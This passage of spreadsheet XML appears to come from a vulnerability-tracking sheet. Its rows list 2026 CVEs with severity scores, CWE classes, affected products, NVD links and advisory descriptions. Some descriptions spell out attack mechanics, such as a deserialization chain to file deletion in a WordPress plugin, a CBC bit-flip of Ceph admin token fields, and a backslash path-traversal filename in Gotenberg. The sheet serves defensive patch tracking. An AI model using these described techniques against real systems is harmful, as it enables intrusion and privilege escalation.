          <t>A flaw was found in DBI. This is a fix for a partial fix for CVE-2026-14380 for RHEL 9.8.z and 10.2.z.
For a detailed Statement, Description and Mitigation please reffer to the original https://access.redhat.com/security/cve/cve-2026-19546.</t>
        </is>
      </c>
      <c r="M758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19546</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19633</t>
        </is>
      </c>
      <c r="C759" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E759" s="5" t="inlineStr"/>
      <c r="F759" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G759" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H759" s="5" t="inlineStr"/>
      <c r="I759" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L759" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability that allows unprivileged masked users to execute arbitrary code by abusing operators, domain casts, or view subqueries that carry untrusted expressions. When these objects are evaluated in the context of the extension’s masking mechanisms, the malicious code can run with elevated privileges. The issue is fixed in PostgreSQL Anonymizer 3.1.4 and later versions</t>
        </is>
      </c>
      <c r="M759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19633</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19887</t>
        </is>
      </c>
      <c r="C760" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E760" s="5" t="inlineStr"/>
      <c r="F760" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="inlineStr"/>
      <c r="I760" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L760" s="5" t="inlineStr">
        <is>
          <t>The Welcart e-Commerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.12.1 via deserialization of untrusted input in the Telecom EDY payment callback (usces_action_acting_transaction). Unauthenticated attackers can store arbitrary 'reserve' key/value pairs as order metadata during a public checkout, then invoke the callback with an attacker-chosen 'option' parameter to select and unserialize that metadata without any provider signature, source-address, transaction-identity or ownership check. A POP chain is present in the TCPDF library bundled with the plugin itself, so no additional plugin or theme is required. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, including wp-config.php, which can lead to remote code execution when an attacker re-runs the WordPress installer against a database they control. Successful exploitation is contingent on an admin printing an invoice to trigger file deletion.</t>
        </is>
      </c>
      <c r="M760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19887</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21092</t>
        </is>
      </c>
      <c r="C761" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E761" s="5" t="inlineStr"/>
      <c r="F761" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="inlineStr"/>
      <c r="I761" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="L761" s="5" t="inlineStr">
        <is>
          <t>Path traversal in ImsService prior to SMR Sep-2026 Release 1 allows remote attackers to create image files with system server privilege.</t>
        </is>
      </c>
      <c r="M761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21092</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27140</t>
        </is>
      </c>
      <c r="C762" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E762" s="5" t="inlineStr"/>
      <c r="F762" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I762" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr">
        <is>
          <t>CWE-641, CWE-863</t>
        </is>
      </c>
      <c r="L762" s="5" t="inlineStr">
        <is>
          <t>SWIG file names containing 'cgo' and well-crafted payloads could lead to code smuggling and arbitrary code execution at build time due to trust layer bypass.</t>
        </is>
      </c>
      <c r="M762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27140</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27606</t>
        </is>
      </c>
      <c r="C763" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E763" s="5" t="inlineStr"/>
      <c r="F763" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G763" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H763" s="5" t="inlineStr">
        <is>
          <t>rollupjs:rollup</t>
        </is>
      </c>
      <c r="I763" s="5" t="inlineStr">
        <is>
          <t>2026-02-25</t>
        </is>
      </c>
      <c r="J763" s="5" t="inlineStr"/>
      <c r="K763" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L763" s="5" t="inlineStr">
        <is>
          <t>Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.</t>
        </is>
      </c>
      <c r="M763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27606</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28609</t>
        </is>
      </c>
      <c r="C764" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E764" s="5" t="inlineStr"/>
      <c r="F764" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="inlineStr"/>
      <c r="I764" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J764" s="5" t="inlineStr"/>
      <c r="K764" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="L764" s="5" t="inlineStr">
        <is>
          <t>In read of MatroskaExtractor.cpp, there is a possible out-of-bounds write due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28609</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28618</t>
        </is>
      </c>
      <c r="C765" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E765" s="5" t="inlineStr"/>
      <c r="F765" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="inlineStr"/>
      <c r="I765" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L765" s="5" t="inlineStr">
        <is>
          <t>In dec_frm_prepare of oapv.c, there is a possible OOB write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28618</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28666</t>
        </is>
      </c>
      <c r="C766" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E766" s="5" t="inlineStr"/>
      <c r="F766" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G766" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H766" s="5" t="inlineStr"/>
      <c r="I766" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L766" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of LocalImageResolver.java, there is a possible Remote Persistent Denial of Service due to a DNG image rendering check bypass. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28666</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30754</t>
        </is>
      </c>
      <c r="C767" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E767" s="5" t="inlineStr"/>
      <c r="F767" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="inlineStr"/>
      <c r="I767" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L767" s="5" t="inlineStr">
        <is>
          <t>A memory corruption vulnerability exists in FFmpeg before 8.1. The RTP encoding process. In the nal_send function in libavformat/rtpenc_h264_hevc.c, a negative size parameter (size=-3) is passed to memcpy when transmitting H.264/HEVC streams via RTP using a crafted input file. This was detected using AddressSanitizer.</t>
        </is>
      </c>
      <c r="M767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30754</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31936</t>
        </is>
      </c>
      <c r="C768" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E768" s="5" t="inlineStr"/>
      <c r="F768" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="inlineStr"/>
      <c r="I768" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L768" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, users can access to unauthorized object information through the search operation. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31936</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32590</t>
        </is>
      </c>
      <c r="C769" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E769" s="5" t="inlineStr"/>
      <c r="F769" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G769" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H769" s="5" t="inlineStr">
        <is>
          <t>redhat:mirror_registry_for_red_hat_openshift, redhat:quay</t>
        </is>
      </c>
      <c r="I769" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J769" s="5" t="inlineStr"/>
      <c r="K769" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L769" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Red Hat Quay's handling of resumable container image layer uploads. The upload process stores intermediate data in the database using a format that, if tampered with, could allow an attacker to execute arbitrary code on the Quay server.</t>
        </is>
      </c>
      <c r="M769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32590</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33001</t>
        </is>
      </c>
      <c r="C770" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E770" s="5" t="inlineStr"/>
      <c r="F770" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G770" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="H770" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="I770" s="5" t="inlineStr">
        <is>
          <t>2026-03-18</t>
        </is>
      </c>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="L770" s="5" t="inlineStr">
        <is>
          <t>Jenkins 2.554 and earlier, LTS 2.541.2 and earlier does not safely handle symbolic links during the extraction of .tar and .tar.gz archives, allowing crafted archives to write files to arbitrary locations on the filesystem, restricted only by file system access permissions of the user running Jenkins.
This can be exploited to deploy malicious scripts or plugins on the controller by attackers with Item/Configure permission, or able to control agent processes.</t>
        </is>
      </c>
      <c r="M770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33001</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33240</t>
        </is>
      </c>
      <c r="C771" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E771" s="5" t="inlineStr"/>
      <c r="F771" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="inlineStr"/>
      <c r="I771" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J771" s="5" t="inlineStr"/>
      <c r="K771" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L771" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there was a Reflected Cross-Site Scripting (XSS) vulnerability in the foreign key search criteria API. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33240</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39944</t>
        </is>
      </c>
      <c r="C772" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D772" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E772" s="5" t="inlineStr"/>
      <c r="F772" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G772" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H772" s="5" t="inlineStr"/>
      <c r="I772" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L772" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the RADOS Gateway (RGW) protects STS session tokens with an AES-128-CBC handler that provides no message authentication, allowing an attacker who holds any valid STS token to tamper with it undetected and escalate to full RGW administrative access. Because the ciphertext is unauthenticated, the attacker can perform a CBC bit-flip on the acct_type, perm_type, and is_admin fields of their own token, and a forged is_admin value triggers a global administrative override that bypasses all capability checks. The attack is reachable remotely over the RGW S3 endpoint and is a self-contained modification of a token the attacker already possesses, requiring no encryption oracle and no network observation. It requires only a single valid STS token, which need not carry any elevated privileges, with STS enabled. This issue is fixed in versions 20.2.4 and 19.2.6.</t>
        </is>
      </c>
      <c r="M772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39944</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40858</t>
        </is>
      </c>
      <c r="C773" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E773" s="5" t="inlineStr"/>
      <c r="F773" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G773" s="5" t="inlineStr">
        <is>
          <t>java, apache, jira</t>
        </is>
      </c>
      <c r="H773" s="5" t="inlineStr">
        <is>
          <t>apache:camel</t>
        </is>
      </c>
      <c r="I773" s="5" t="inlineStr">
        <is>
          <t>2026-04-27</t>
        </is>
      </c>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L773" s="5" t="inlineStr">
        <is>
          <t>The camel-infinispan component's ProtoStream-based remote aggregation repository deserializes data read from a remote Infinispan cache using java.io.ObjectInputStream without applying any ObjectInputFilter. An attacker who can write to the Infinispan cache used by a Camel application can inject a crafted serialized Java object that, when read during normal aggregation repository operations such as get or recover, results in arbitrary code execution in the context of the application.
This issue affects Apache Camel: from 4.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0.
Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.
The JIRA ticket:  https://issues.apache.org/jira/browse/CAMEL-23322  refers to the various commits that resolved the issue, and have more details. This issue follows the same class of vulnerability previously addressed in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747.</t>
        </is>
      </c>
      <c r="M773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40858</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41870</t>
        </is>
      </c>
      <c r="C774" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E774" s="5" t="inlineStr"/>
      <c r="F774" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G774" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H774" s="5" t="inlineStr"/>
      <c r="I774" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-862, CWE-913, CWE-94</t>
        </is>
      </c>
      <c r="L774" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Improper Control of Generation of Code ('Code Injection'), Improper Control of Dynamically-Managed Code Resources, Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Apache Nutch Server  (Nutch REST API).
This issue affects Apache Nutch: from 1.11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774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41870</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42016</t>
        </is>
      </c>
      <c r="C775" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E775" s="5" t="inlineStr"/>
      <c r="F775" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="I775" s="5" t="inlineStr">
        <is>
          <t>2026-07-27</t>
        </is>
      </c>
      <c r="J775" s="5" t="inlineStr"/>
      <c r="K775" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L775" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory (Self Hosted) versions before 7.133.11 are vulnerable to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t>
        </is>
      </c>
      <c r="M775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43112</t>
        </is>
      </c>
      <c r="C776" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E776" s="5" t="inlineStr"/>
      <c r="F776" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G776" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H776" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I776" s="5" t="inlineStr">
        <is>
          <t>2026-05-06</t>
        </is>
      </c>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L776" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/smb/client: fix out-of-bounds read in cifs_sanitize_prepath
When cifs_sanitize_prepath is called with an empty string or a string
containing only delimiters (e.g., "/"), the current logic attempts to
check *(cursor2 - 1) before cursor2 has advanced. This results in an
out-of-bounds read.
This patch adds an early exit check after stripping prepended
delimiters. If no path content remains, the function returns NULL.
The bug was identified via manual audit and verified using a
standalone test case compiled with AddressSanitizer, which
triggered a SEGV on affected inputs.</t>
        </is>
      </c>
      <c r="M776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43112</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44829</t>
        </is>
      </c>
      <c r="C777" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E777" s="5" t="inlineStr"/>
      <c r="F777" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G777" s="5" t="inlineStr">
        <is>
          <t>windows, docker</t>
        </is>
      </c>
      <c r="H777" s="5" t="inlineStr"/>
      <c r="I777" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J777" s="5" t="inlineStr"/>
      <c r="K777" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L777" s="5" t="inlineStr">
        <is>
          <t>Gotenberg is a Docker-powered stateless API for PDF files. In 8.32.0 and earlier, filename handling in pkg/modules/api/context.go uses filepath.Base on Linux, which does not treat backslashes as path separators, so a multipart filename containing Windows-style parent directory components survives sanitization. The original filename flows through ctx.diskToOriginal and the multi-output PDF routes into archives.FilesFromDisk and archives.Zip.Archive as the generated zip entry name. A remote attacker can submit a name such as ........\Windows\System32\evil.pdf through an upload or an upstream downloadFrom Content-Disposition header, and a Windows archive extractor can write the resulting file outside the intended extraction directory. The affected paths include /forms/pdfengines/split and other multi-output PDF, LibreOffice, and conversion routes, and exploitation can cause arbitrary file writes on a downstream Windows system when a user or process extracts the returned archive. This issue is fixed in version 8.33.0.</t>
        </is>
      </c>
      <c r="M777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44829</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4601</t>
        </is>
      </c>
      <c r="C778" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E778" s="5" t="inlineStr"/>
      <c r="F778" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="inlineStr">
        <is>
          <t>kjur:jsrsasign</t>
        </is>
      </c>
      <c r="I778" s="5" t="inlineStr">
        <is>
          <t>2026-03-23</t>
        </is>
      </c>
      <c r="J778" s="5" t="inlineStr"/>
      <c r="K778" s="5" t="inlineStr">
        <is>
          <t>CWE-325</t>
        </is>
      </c>
      <c r="L778" s="5" t="inlineStr">
        <is>
          <t>Versions of the package jsrsasign before 11.1.1 are vulnerable to Missing Cryptographic Step via the KJUR.crypto.DSA.signWithMessageHash process in the DSA signing implementation. An attacker can recover the private key by forcing r or s to be zero, so the library emits an invalid signature without retrying, and then solves for x from the resulting signature.</t>
        </is>
      </c>
      <c r="M778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4601</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48050</t>
        </is>
      </c>
      <c r="C779" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E779" s="5" t="inlineStr"/>
